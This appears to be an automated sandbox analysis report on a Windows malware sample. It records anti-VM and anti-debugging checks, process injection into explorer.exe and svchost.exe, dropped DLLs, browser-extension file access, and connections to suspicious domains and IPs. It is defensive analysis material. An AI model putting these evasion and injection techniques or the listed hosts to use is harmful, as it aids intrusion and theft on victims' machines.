                          Source: C:\Users\user\AppData\Local\Temp\D452.exeRDTSC instruction interceptor: First address: 00000000008841C1 second address: 00000000008841C7 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov edi, esi 0x00000005 push esi 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\D452.exeRDTSC instruction interceptor: First address: 00000000008841C7 second address: 0000000000794FA4 instructions: 0x00000000 rdtsc 0x00000002 cwd 0x00000004 lahf 0x00000005 inc ecx 0x00000006 push esp 0x00000007 inc ecx 0x00000008 setno cl 0x0000000b cbw 0x0000000d push ebx 0x0000000e inc cx 0x00000010 movzx esi, ch 0x00000013 inc ecx 0x00000014 mov cl, E5h 0x00000016 push edi 0x00000017 jmp 00007F75E8AACCC4h 0x0000001c pushfd 0x0000001d cwde 0x0000001e bswap eax 0x00000020 push ebp 0x00000021 cwd 0x00000023 dec ecx 0x00000024 ror edi, 03h 0x00000027 jmp 00007F75E8AD9070h 0x0000002c dec esp 0x0000002d lea edi, dword ptr [FF86B0BCh] 0x00000033 inc ecx 0x00000034 push edi 0x00000035 inc ecx 0x00000036 add dh, 00000065h 0x00000039 inc cx 0x0000003b rcr ecx, 29h 0x0000003e dec esp 0x0000003f mov ecx, dword ptr [esp+00000090h] 0x00000046 cwd 0x00000048 inc ecx 0x00000049 neg ecx 0x0000004b rcl esi, cl 0x0000004d inc ecx 0x0000004e ror ecx, 02h 0x00000051 inc ecx 0x00000052 inc ecx 0x00000054 dec ebp 0x00000055 and esi, edi 0x00000057 inc ebp 0x00000058 test bl, bl 0x0000005a inc ecx 0x0000005b bswap ecx 0x0000005d dec ebp 0x0000005e add ecx, edi 0x00000060 inc cx 0x00000062 rol esi, FFFFFFA4h 0x00000065 dec eax 0x00000066 mov esi, esp 0x00000068 inc ecx 0x00000069 adc bl, FFFFFFD9h 0x0000006c dec eax 0x0000006d sub esp, 00000140h 0x00000073 dec eax 0x00000074 cwde 0x00000075 inc bp 0x00000077 btr esi, esi 0x0000007a cbw 0x0000007c dec eax 0x0000007d and esp, FFFFFFF0h 0x00000083 dec eax 0x00000084 bt edx, edi 0x00000087 dec ebp 0x00000088 mov esi, ecx 0x0000008a btc dx, FFDCh 0x0000008f dec ebp 0x00000090 movzx ebx, cx 0x00000093 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\D452.exeRDTSC instruction interceptor: First address: 000000000083A52F second address: 000000000083A535 instructions: 0x00000000 rdtsc 0x00000002 dec cl 0x00000004 neg cl 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\239.exeRDTSC instruction interceptor: First address: 00000000008841C1 second address: 00000000008841C7 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov edi, esi 0x00000005 push esi 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\239.exeRDTSC instruction interceptor: First address: 00000000008841C7 second address: 0000000000794FA4 instructions: 0x00000000 rdtsc 0x00000002 cwd 0x00000004 lahf 0x00000005 inc ecx 0x00000006 push esp 0x00000007 inc ecx 0x00000008 setno cl 0x0000000b cbw 0x0000000d push ebx 0x0000000e inc cx 0x00000010 movzx esi, ch 0x00000013 inc ecx 0x00000014 mov cl, E5h 0x00000016 push edi 0x00000017 jmp 00007F75E924B754h 0x0000001c pushfd 0x0000001d cwde 0x0000001e bswap eax 0x00000020 push ebp 0x00000021 cwd 0x00000023 dec ecx 0x00000024 ror edi, 03h 0x00000027 jmp 00007F75E9277B00h 0x0000002c dec esp 0x0000002d lea edi, dword ptr [FF86B0BCh] 0x00000033 inc ecx 0x00000034 push edi 0x00000035 inc ecx 0x00000036 add dh, 00000065h 0x00000039 inc cx 0x0000003b rcr ecx, 29h 0x0000003e dec esp 0x0000003f mov ecx, dword ptr [esp+00000090h] 0x00000046 cwd 0x00000048 inc ecx 0x00000049 neg ecx 0x0000004b rcl esi, cl 0x0000004d inc ecx 0x0000004e ror ecx, 02h 0x00000051 inc ecx 0x00000052 inc ecx 0x00000054 dec ebp 0x00000055 and esi, edi 0x00000057 inc ebp 0x00000058 test bl, bl 0x0000005a inc ecx 0x0000005b bswap ecx 0x0000005d dec ebp 0x0000005e add ecx, edi 0x00000060 inc cx 0x00000062 rol esi, FFFFFFA4h 0x00000065 dec eax 0x00000066 mov esi, esp 0x00000068 inc ecx 0x00000069 adc bl, FFFFFFD9h 0x0000006c dec eax 0x0000006d sub esp, 00000140h 0x00000073 dec eax 0x00000074 cwde 0x00000075 inc bp 0x00000077 btr esi, esi 0x0000007a cbw 0x0000007c dec eax 0x0000007d and esp, FFFFFFF0h 0x00000083 dec eax 0x00000084 bt edx, edi 0x00000087 dec ebp 0x00000088 mov esi, ecx 0x0000008a btc dx, FFDCh 0x0000008f dec ebp 0x00000090 movzx ebx, cx 0x00000093 rdtsc
                          Source: C:\Users\user\AppData\Local\Temp\239.exeRDTSC instruction interceptor: First address: 000000000083A52F second address: 000000000083A535 instructions: 0x00000000 rdtsc 0x00000002 dec cl 0x00000004 neg cl 0x00000006 rdtsc
                          Checks if the current machine is a virtual machine (disk enumeration)Show sources
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeEvasive API call chain: GetPEB, DecisionNodes, Sleep
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                          Contains functionality to detect sleep reduction / modificationsShow sources
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_00406AA0
                          Found evasive API chain (may stop execution after checking computer name)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeEvasive API call chain: GetComputerName,DecisionNodes,Sleep
                          Source: C:\Windows\explorer.exe TID: 4828Thread sleep count: 625 > 30
                          Source: C:\Windows\explorer.exe TID: 4628Thread sleep count: 302 > 30
                          Source: C:\Windows\explorer.exe TID: 4628Thread sleep time: -30200s >= -30000s
                          Source: C:\Windows\explorer.exe TID: 4544Thread sleep count: 270 > 30
                          Source: C:\Windows\explorer.exe TID: 5632Thread sleep count: 500 > 30
                          Source: C:\Windows\explorer.exe TID: 5592Thread sleep count: 216 > 30
                          Source: C:\Windows\explorer.exe TID: 5672Thread sleep count: 224 > 30
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exe TID: 5224Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\SysWOW64\svchost.exe TID: 4680Thread sleep count: 50 > 30
                          Source: C:\Windows\SysWOW64\svchost.exe TID: 4680Thread sleep time: -50000s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 4112Thread sleep time: -30000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exe TID: 5904Thread sleep time: -30000s >= -30000s
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 625
                          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 500
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeAPI coverage: 8.1 %
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeAPI coverage: 6.0 %
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_00406AA0
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\lgpllibs.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\ldap60.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\ldif60.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\breakpadinjector.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\nssdbm3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleHandler.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\qipcap.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\vcruntime140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\prldap60.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\libEGL.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\freebl3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleMarshal.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\IA2Marshal.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\softokn3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy_InUse.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeEvaded block: after key decision
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeEvaded block: after key decision
                          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                          Source: explorer.exe, 00000002.00000000.385228035.00000000083E0000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
                          Source: explorer.exe, 00000002.00000000.400678824.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                          Source: svchost.exe, 0000001D.00000002.641835907.0000019DDEE2A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWrf%SystemRoot%\system32\mswsock.dllRIs></cfg:Configuration></Signature>
                          Source: explorer.exe, 00000002.00000000.380915081.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: explorer.exe, 00000002.00000000.385228035.00000000083E0000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
                          Source: svchost.exe, 0000001E.00000002.650238715.000002324785D000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
                          Source: explorer.exe, 00000002.00000000.380915081.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: WerFault.exe, 0000000C.00000002.499940204.0000000004F9F000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.495220795.0000000004FF0000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000002.500036054.0000000004FF0000.00000004.00000001.sdmp, svchost.exe, 0000001E.00000002.649941211.000002324784C000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000002.650660654.0000000002FEE000.00000004.00000020.sdmp, A7F0.exe, 0000001F.00000002.663539364.00000000051D4000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                          Source: explorer.exe, 00000002.00000000.400150959.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
                          Source: svchost.exe, 0000001E.00000002.643084877.0000023242029000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW@Q
                          Source: explorer.exe, 00000002.00000000.400150959.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                          Source: explorer.exe, 00000002.00000000.400678824.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
                          Source: explorer.exe, 00000002.00000000.391269138.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeProcess information queried: ProcessInformation
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: 11_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_004197F1 BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,SetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameA,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeW,FindFirstFileExW,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeSystem information queried: ModuleInformation

                          Anti Debugging:

                          barindex
                          Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeSystem information queried: CodeIntegrityInformation
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjSystem information queried: CodeIntegrityInformation
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_00435670 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_00640042 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjCode function: 5_2_0073595D push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_00470083 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_0208092B mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_02080D90 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_00401000 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_0040C180 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_00931893 push dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: 11_2_0063092B mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: 11_2_00630D90 mov eax, dword ptr fs:[00000030h]
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjProcess queried: DebugPort
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_00422A40 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeCode function: 8_2_004048D0 VirtualProtect ?,00000004,00000100,00000000
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_0042CA22 InterlockedIncrement,__itow_s,__invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,__snwprintf_s,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,GetFileType,_wcslen,WriteConsoleW,GetLastError,__invoke_watson_if_oneof,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,__invoke_watson_if_error,___crtMessageWindowW,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_00419A3A SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringA,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeaps,WritePrivateProfileStringA,GetPriorityClass,
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeProcess token adjusted: Debug
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 1_1_004027ED LdrLoadDll,
                          Source: C:\Users\user\AppData\Local\Temp\2DB3.exeMemory protected: page guard
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_0043A950 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_00422A40 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_0042BB60 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_004283D0 SetUnhandledExceptionFilter,
                          Source: C:\Users\user\AppData\Local\Temp\1E7F.exeCode function: 7_2_0040976C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: 11_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                          HIPS / PFW / Operating System Protection Evasion:

                          barindex
                          System process connects to network (likely due to code injection or exploit)Show sources
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 40.93.207.0 25
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.142.143.116 443
                          Source: C:\Windows\SysWOW64\svchost.exeDomain query: patmushta.info
                          Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                          Source: C:\Windows\explorer.exeNetwork Connect: 188.166.28.199 80
                          Source: C:\Windows\explorer.exeDomain query: unicupload.top
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                          Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                          Source: C:\Windows\explorer.exeDomain query: microsoft-com.mail.protection.outlook.com
                          Source: C:\Windows\explorer.exeDomain query: goo.su
                          Source: C:\Windows\explorer.exeDomain query: transfer.sh
                          Source: C:\Windows\explorer.exeDomain query: a0621298.xsph.ru
                          Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                          Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                          Benign windows process drops PE filesShow sources
                          Source: C:\Windows\explorer.exeFile created: A7F0.exe.2.drJump to dropped file
                          Maps a DLL or memory area into another processShow sources
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                          Allocates memory in foreign processesShow sources
                          Source: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 4D0000 protect: page execute and read and write
                          Injects a PE file into a foreign processesShow sources
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeMemory written: C:\Users\user\Desktop\zmbGUZTICp.exe base: 400000 value starts with: 4D5A
                          Source: C:\Users\user\AppData\Local\Temp\3F71.exeMemory written: C:\Users\user\AppData\Local\Temp\3F71.exe base: 400000 value starts with: 4D5A
                          Source: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4D0000 value starts with: 4D5A
                          Contains functionality to inject code into remote processesShow sources
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeCode function: 0_2_00640110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                          Creates a thread in another existing process (thread injection)Show sources
                          Source: C:\Users\user\Desktop\zmbGUZTICp.exeThread created: C:\Windows\explorer.exe EIP: 4151930
                          Source: C:\Users\user\AppData\Roaming\gdrgbdjThread created: unknown EIP: 48F1930
                          Writes to foreign memory regionsShow sources
                          Source: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4D0000
                          Source: C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 333008
                          .NET source code references suspicious native API functionsShow sources
